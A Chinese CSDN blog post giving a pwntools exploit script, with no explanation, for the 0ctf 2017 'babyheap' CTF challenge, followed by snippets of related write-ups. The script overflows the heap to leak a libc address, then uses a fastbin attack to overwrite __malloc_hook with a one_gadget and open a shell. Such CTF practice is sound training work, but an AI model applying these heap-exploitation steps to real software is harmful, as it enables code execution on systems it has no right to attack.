0ctf2017 babyheap

最新推荐文章于 2023-03-28 10:37:18 发布
最新推荐文章于 2023-03-28 10:37:18 发布
阅读量160 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pondzhang/article/details/110749059
版权 
from pwn import *

#p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"})

p = remote("node3.buuoj.cn",26165)
elf = ELF('./0ctf_2017_babyheap')
libc = ELF("./libc-2.23.so")


def Allocate(size):
    p.recvuntil('Command: ')
    p.sendline('1')
    p.recvuntil('Size: ')
    p.sendline(str(size))


def Fill(idx,content):
    p.recvuntil('Command: ')
    p.sendline('2')
    p.recvuntil('Index: ')
    p.sendline(str(idx))
    p.recvuntil('Size: ')
    p.sendline(str(len(content)))
    p.recvuntil('Content: ')
    p.sendline(content)


def Free(idx):
    p.recvuntil('Command: ')
    p.sendline('3')
    p.recvuntil('Index: ')
    p.sendline(str(idx))


def Dump(idx):
    p.recvuntil('Command: ')
    p.sendline('4')
    p.recvuntil('Index: ')
    p.sendline(str(idx))


Allocate(0x10) #0
Allocate(0x10) #1
Allocate(0x80) #2
Allocate(0x10) #3
Allocate(0x68) #4
Allocate(0x10) #5
Fill(0,'a'*24+p64(0xb1))
Free(1)
Allocate(0xa0) #1
Fill(1,'b'*24+p64(0x91))
Free(2)
Dump(1)

mainarea88 = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success(hex(mainarea88))

libcbase = mainarea88 - (0x7f9b47a14b78-0x7f9b47650000)
log.success(hex(libcbase))

malloc_hook = libcbase + libc.symbols['__malloc_hook']

log.success(hex(malloc_hook))

one_gadget = libcbase + 0x4526a
Free(4)        #4
Fill(3,'c'*24+p64(0x71)+p64(malloc_hook-0x23))



Allocate(0x68) #2
Allocate(0x68) #4
Fill(4,'\x00'*0x13+p64(one_gadget))
Allocate(0x10)
p.interactive()

 

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3790
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2792
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1616
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
[BUUCTF] babyheap_0ctf_2017
红叶的博客
03-28 797
有点回想起当初第一次拿到flag时的感觉,继续加油。 本题考察知识点:**Fastbin Attack** 与 **Unsorted Bin Attack。** 通过使用Fastbin Attack与堆溢出漏洞,我们可以绕过Free后指针置零,从而达到在置零指针后获取堆块fd指针。 通过Unsorted Bin Attack,我们可以泄露Libc地址。 然后我们再使用Fastbin Attack替换__malloc_hook 本文写给自己,也写给跟我一样全网寻找详细解答的师傅们。
babyheap_0ctf_2017
m0sway的博客
11-25 524
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
blizzardctf2017:暴雪CTF 2017
05-18
暴雪CTF 2017:Sombra真随机数生成器(STRNG) Sombra真实随机数生成器(STRNG)是我为Blizzard CTF 2017开发的基于QEMU的挑战。挑战是实现从基于QEMU的VM逃脱VM并捕获位于主机上/ root / flag的标志。安装挑战中...
0ctf-2017-pwn-char
02-05
2017年0ctf的pwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
Rhme-2017:Riscure Hack Me嵌入式硬件CTF 2017-2018
05-16
**Rhme-2017: Riscure Hack Me 嵌入式硬件 CTF 2017-2018** 这篇文章将探讨Riscure Hack Me在2017-2018年举办的嵌入式硬件CTF(Capture The Flag)挑战赛。CTF是一种网络安全竞赛,参赛者通过解决各种技术问题来...
0ctf Babyheap 2017
Bill
03-11 6395
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 627
babyheap
babyheap_0_ctf_2017
m0_48127441的博客
04-01 197
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
0CTF-babyheap2017祥讲
Jc
07-26 452
解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 安全机制全部开启了,其实不用慌,对我们做题影响不是很大 运行 ## IDA ...
【BUUCTF - PWN】babyheap_0ctf_2017
古月浪子的博客
04-05 2631
checksec一下,堆题果然是保护全开 IDA打开看看,首先mmap一块随机区域,用于存放我们申请的块的属性,然后输出菜单,有allocate、fill、free、dump功能 可以注意到,在创建堆的时候,将堆的地址和大小存放在了mmap的区域中,并且使用的是calloc,会将申请的内存区域清零 漏洞点在fill函数中,没有限制输入内容的长度,从而可以堆溢出 删除堆后会将指针置零 输出...
0ctf_2017_babyheap
z1r0的博客
12-23 920
0ctf_2017_babyheap 查看保护 edit可以改size,堆溢出,overlapping泄露libc。fastbin attack改hook为onegadget即可getshell。overlapping和fastbin的攻击手法具体看z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug:
ctf从0到1电子书
最新发布
12-14
《CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值